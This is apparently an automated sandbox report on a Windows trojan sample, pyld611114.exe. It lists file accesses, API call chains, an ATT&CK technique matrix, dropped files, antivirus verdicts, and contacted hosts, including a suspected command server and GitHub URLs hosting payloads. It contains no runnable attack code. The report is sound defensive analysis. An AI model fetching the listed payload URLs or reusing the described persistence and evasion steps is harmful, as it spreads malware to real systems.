Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: (second powershell.exe instance; the same 18 queries as the first powershell.exe block, from the Microsoft-Windows-Client-Features catalog through Microsoft.BitLocker.Structures.dll, repeated verbatim)
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: (third powershell.exe instance; the same 18 queries as the first powershell.exe block, from the Microsoft-Windows-Client-Features catalog through Microsoft.BitLocker.Structures.dll, repeated verbatim)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: (fourth, fifth and sixth powershell.exe instances; each repeats verbatim the same 18 queries as the first powershell.exe block, from the Microsoft-Windows-Client-Features catalog through Microsoft.BitLocker.Structures.dll)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Users\user\Desktop\pyld611114.exeCode function: 0_2_00007FF668343EF0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF668343EF0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA36D2860 GetUserNameA,GetLastError,_strdup,42_2_00007FFDA36D2860
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA3776B40 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,42_2_00007FFDA3776B40
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA377D7E0 bind,WSAGetLastError,45_2_00007FFDA377D7E0
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA374C620 strchr,strchr,inet_pton,strchr,strtoul,strchr,strtoul,memmove,getsockname,WSAGetLastError,inet_ntop,WSAGetLastError,memmove,htons,bind,WSAGetLastError,getsockname,getsockname,listen,WSAGetLastError,htons,45_2_00007FFDA374C620
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA377D5B2 bind,WSAGetLastError,45_2_00007FFDA377D5B2
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3776B0D htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,45_2_00007FFDA3776B0D
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA3776B40 socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,45_2_00007FFDA3776B40
Source: C:\Windows\System32\console_zero.exeCode function: 45_2_00007FFDA37378B0 memset,strncmp,strncmp,strchr,inet_pton,htons,strtoul,inet_pton,htons,htons,bind,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,45_2_00007FFDA37378B0
MITRE ATT&CK matrix (one line per tactic column; a leading number is the report's hit count for that technique):
Reconnaissance: Gather Victim Identity Information | Credentials | Email Addresses | Employee Names | Gather Victim Network Information | Domain Properties | DNS | Network Trust Dependencies | Network Topology | IP Addresses
Resource Development: Acquire Infrastructure | Domains | DNS Server | Virtual Private Server | Server | Botnet | Web Services | Serverless | Malvertising | Compromise Infrastructure
Initial Access: Valid Accounts | Default Accounts | Domain Accounts | Local Accounts | Cloud Accounts | Replication Through Removable Media | External Remote Services | Drive-by Compromise | Exploit Public-Facing Application | Supply Chain Compromise
Execution: 1 Native API | 12 Command and Scripting Interpreter | 1 Scheduled Task/Job | 1 Service Execution | Launchd | Scheduled Task | Systemd Timers | Container Orchestration Job | Command and Scripting Interpreter | PowerShell
Persistence: 1 DLL Side-Loading | 111 Windows Service | 1 Scheduled Task/Job | Login Hook | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron
Privilege Escalation: 1 DLL Side-Loading | 111 Windows Service | 11 Process Injection | 1 Scheduled Task/Job | Network Logon Script | RC Scripts | Startup Items | Scheduled Task/Job | At | Cron
Defense Evasion: 1 Disable or Modify Tools | 1 Deobfuscate/Decode Files or Information | 2 Obfuscated Files or Information | 1 DLL Side-Loading | 11 File Deletion | 121 Masquerading | 1 Modify Registry | 131 Virtualization/Sandbox Evasion | 11 Process Injection | Dynamic API Resolution
Credential Access: OS Credential Dumping | LSASS Memory | Security Account Manager | NTDS | LSA Secrets | Cached Domain Credentials | DCSync | Proc Filesystem | /etc/passwd and /etc/shadow | Network Sniffing
Discovery: 11 System Time Discovery | 1 Account Discovery | 1 File and Directory Discovery | 42 System Information Discovery | 331 Security Software Discovery | 1 Process Discovery | 131 Virtualization/Sandbox Evasion | 1 Application Window Discovery | 1 System Owner/User Discovery | 1 System Network Configuration Discovery
Lateral Movement: 1 Exploitation of Remote Services | Remote Desktop Protocol | SMB/Windows Admin Shares | Distributed Component Object Model | SSH | VNC | Windows Remote Management | Cloud Services | Direct Cloud VM Connections | Shared Webroot
Collection: 12 Archive Collected Data | Data from Removable Media | Data from Network Shared Drive | Input Capture | Keylogging | GUI Input Capture | Web Portal Capture | Credential API Hooking | Data Staged | Local Data Staging
Command and Control: 1 Ingress Tool Transfer | 22 Encrypted Channel | 1 Non-Standard Port | 1 Non-Application Layer Protocol | 2 Application Layer Protocol | Multiband Communication | Commonly Used Port | Application Layer Protocol | Web Protocols | File Transfer Protocols
Exfiltration: Exfiltration Over Other Network Medium | Exfiltration Over Bluetooth | Automated Exfiltration | Traffic Duplication | Scheduled Transfer | Data Transfer Size Limits | Exfiltration Over C2 Channel | Exfiltration Over Alternative Protocol | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
Impact: 1 Data Encrypted for Impact | Network Denial of Service | Data Encrypted for Impact | Data Destruction | Data Encrypted for Impact | Service Stop | Inhibit System Recovery | Defacement | Internal Defacement | External Defacement
Behavior Graph (the rendered graph image is not included in this export). Behavior Graph ID: 1577366; Sample: pyld611114.exe; Startdate: 18/12/2024; Architecture: WINDOWS; Score: 100.
Process chain shown in the graph: pyld611114.exe drops C:\Windows\System32\usvcinsta64.exe and starts three cmd.exe instances; their child processes drop C:\Windows \System32\printui.dll and C:\Windows \System32\printui.exe and start printui.exe, powershell.exe and timeout.exe. printui.exe drops C:\Windows\System32\zlib1.dll, C:\Windows\System32\x816796.dat, C:\Windows\System32\ucrtbased.dll and 9 other files (7 malicious), then starts cmd.exe instances that launch console_zero.exe, powershell.exe, reg.exe and sc.exe; console_zero.exe starts cmd.exe, which launches schtasks.exe. svchost.exe contacts runvrs.com (188.116.21.204, NEPHAX-ASPL, Poland), github.com (20.233.83.145, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States), raw.githubusercontent.com and 2 other IPs or domains; a second svchost.exe instance contacts 127.0.0.1.
Signatures attached to graph nodes: Antivirus detection for dropped file; Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for dropped file; Self deletion via cmd or bat file; Adds a directory exclusion to Windows Defender; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Drops executables to the windows directory (C:\Windows) and starts them; Uses schtasks.exe or at.exe to add and modify task schedules; Loading BitLocker PowerShell Module; Found API chain indicative of debugger detection; Creates a Windows Service pointing to an executable in C:\Windows; 11 other signatures.

Source | Detection | Scanner | Label | Link
pyld611114.exe | 76% | ReversingLabs | Win64.Trojan.Amadey | -
pyld611114.exe | 100% | Avira | TR/AD.Nekark.dzein | -
pyld611114.exe | 100% | Joe Sandbox ML | - | -
Source | Detection | Scanner | Label | Link
C:\Windows \System32\printui.dll | 100% | Avira | TR/Crypt.Agent.uguls | -
C:\Windows\System32\x816796.dat | 100% | Avira | TR/Agent.gjkfm | -
C:\Windows\System32\usvcinsta64.exe | 100% | Avira | TR/AD.Nekark.jksvb | -
C:\Windows\System32\console_zero.exe | 100% | Avira | TR/AVI.Agent.iscto | -
C:\Windows\System32\x816796.dat | 100% | Joe Sandbox ML | - | -
C:\Windows \System32\printui.dll | 75% | ReversingLabs | Win64.Trojan.Lazy | -
C:\Windows \System32\printui.exe | 0% | ReversingLabs | - | -
C:\Windows\System32\console_zero.exe | 71% | ReversingLabs | Win64.Trojan.Lazy | -
C:\Windows\System32\libcrypto-3-x64.dll | 0% | ReversingLabs | - | -
C:\Windows\System32\libcurl.dll | 0% | ReversingLabs | - | -
C:\Windows\System32\libiconv-2.dll | 0% | ReversingLabs | - | -
C:\Windows\System32\libintl-9.dll | 0% | ReversingLabs | - | -
C:\Windows\System32\libpq.dll | 0% | ReversingLabs | - | -
C:\Windows\System32\libssl-3-x64.dll | 0% | ReversingLabs | - | -
C:\Windows\System32\libwinpthread-1.dll | 0% | ReversingLabs | - | -
C:\Windows\System32\ucrtbased.dll | 0% | ReversingLabs | - | -
C:\Windows\System32\usvcinsta64.exe | 83% | ReversingLabs | Win64.Trojan.Leonem | -
C:\Windows\System32\vcruntime140d.dll | 0% | ReversingLabs | - | -
C:\Windows\System32\x816796.dat | 71% | ReversingLabs | Win64.Trojan.Generic | -
C:\Windows\System32\zlib1.dll | 0% | ReversingLabs | - | -
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://schemas.mi | 0% | Avira URL Cloud | safe | -
http://mingw-w64.sourceforge.net/X | 0% | Avira URL Cloud | safe | -
Name | IP | Active | Malicious | Antivirus Detection | Reputation
runvrs.com | 188.116.21.204 | true | false | - | unknown
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | - | high
ipinfo.io | 34.117.59.81 | true | false | - | high
github.com | 20.233.83.145 | true | false | - | high
raw.githubusercontent.com | 185.199.110.133 | true | false | - | high
fp2e7a.wpc.phicdn.net | 192.229.221.95 | true | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.mi | svchost.exe, 00000013.00000002.3449448298.000001F6CDEB0000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/http-cookies.html | pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp | false | - | high
https://www.gnu.org/licenses/ | pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3448369571.00000000660F4000.00000008.00000001.01000000.00000013.sdmp | false | - | high
https://g.live.com/odclientsettings/ProdV21C: | svchost.exe, 00000013.00000003.2384375707.000001F6D3370000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://crl.ver) | svchost.exe, 00000013.00000002.3450915324.000001F6D3611000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://curl.se/docs/alt-svc.html | pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp | false | - | high
https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/unv.dat | svchost.exe, 0000002A.00000002.3449729846.00000266EA4EE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://www.openssl.org/ | svchost.exe | false | - | high
https://curl.se/docs/hsts.html | pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp | false | - | high
https://curl.se/docs/alt-svc.html# | console_zero.exe | false | - | high
https://curl.se/docs/copyright.htmlD | pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002D.00000002.2564285158.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp | false | - | high
https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpusys.dat | svchost.exe, 0000002A.00000002.3449729846.00000266EA4EE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://curl.se/ | svchost.exe, console_zero.exe | false | - | high
https://g.live.com/odclientsettings/Prod1C: | svchost.exe, 00000013.00000003.2384375707.000001F6D33CE000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.zlib.net/ | svchost.exe | false | - | high
http://mingw-w64.sourceforge.net/X | pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3447936117.0000000064953000.00000008.00000001.01000000.00000012.sdmp | false | Avira URL Cloud: safe | unknown
https://curl.se/docs/copyright.html | svchost.exe, console_zero.exe | false | - | high
http://worldtimeapi.org/api/timezone/Etc/UTC | console_zero.exe, 0000002D.00000002.2563177329.000001D7ED32C000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.zlib.net/D | pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452208317.00007FFDA5477000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002D.00000002.2564413372.00007FFDA5477000.00000002.00000001.01000000.0000000E.sdmp | false | - | high
https://curl.se/docs/hsts.html# | console_zero.exe | false | - | high
https://ipinfo.io/json | pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp | false | - | high
https://www.openssl.org/H | pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmp, svchost.exe, 0000002A.00000002.3450978095.00007FFD9408E000.00000002.00000001.01000000.00000010.sdmp | false | - | high
https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/ucpu.dat | svchost.exe, 0000002A.00000002.3449729846.00000266EA4EE000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://worldtimeapi.org/api/timezone/Etc/UTCapplication/octet-streamtext/plain; | pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, console_zero.exe, 0000002D.00000000.2532139890.00007FF71FA3C000.00000002.00000001.01000000.00000014.sdmp, console_zero.exe, 0000002D.00000002.2563922460.00007FF71FA3C000.00000002.00000001.01000000.00000014.sdmp | false | - | high
https://curl.se/docs/http-cookies.html# | console_zero.exe | false | - | high
https://github.com/runvd01/dwl/raw/refs/heads/main/un2/uusb.dat | svchost.exe, 0000002A.00000002.3450200488.00000266EA924000.00000004.00000020.00020000.00000000.sdmp | false | - | high
https://github.com/runvd01/dwl/raw/refs/heads/main/cmn/uamd.dat | svchost.exe, 0000002A.00000002.3449969880.00000266EA90F000.00000004.00000020.00020000.00000000.sdmp | false | - | high
http://www.gnu.org/licenses/ | pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3448830797.00000000682A4000.00000008.00000001.01000000.00000011.sdmp | false | - | high
https://curl.se/V | pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002D.00000002.2564285158.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp | false | - | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
34.117.59.81 | ipinfo.io | United States | - | 139070 | GOOGLE-AS-APGoogleAsiaPacificPteLtdSG | false
188.116.21.204 | runvrs.com | Poland | - | 43333 | NEPHAX-ASPL | false
20.233.83.145 | github.com | United States | - | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
185.199.110.133 | raw.githubusercontent.com | Netherlands | - | 54113 | FASTLYUS | false
IP
127.0.0.1
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577366
Start date and time: 2024-12-18 12:40:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 94
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: pyld611114.exe
Detection: MAL
Classification: mal100.evad.winEXE@125/51@4/5
EGA Information:
• Successful, ratio: 71.4%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, WmiPrvSE.exe
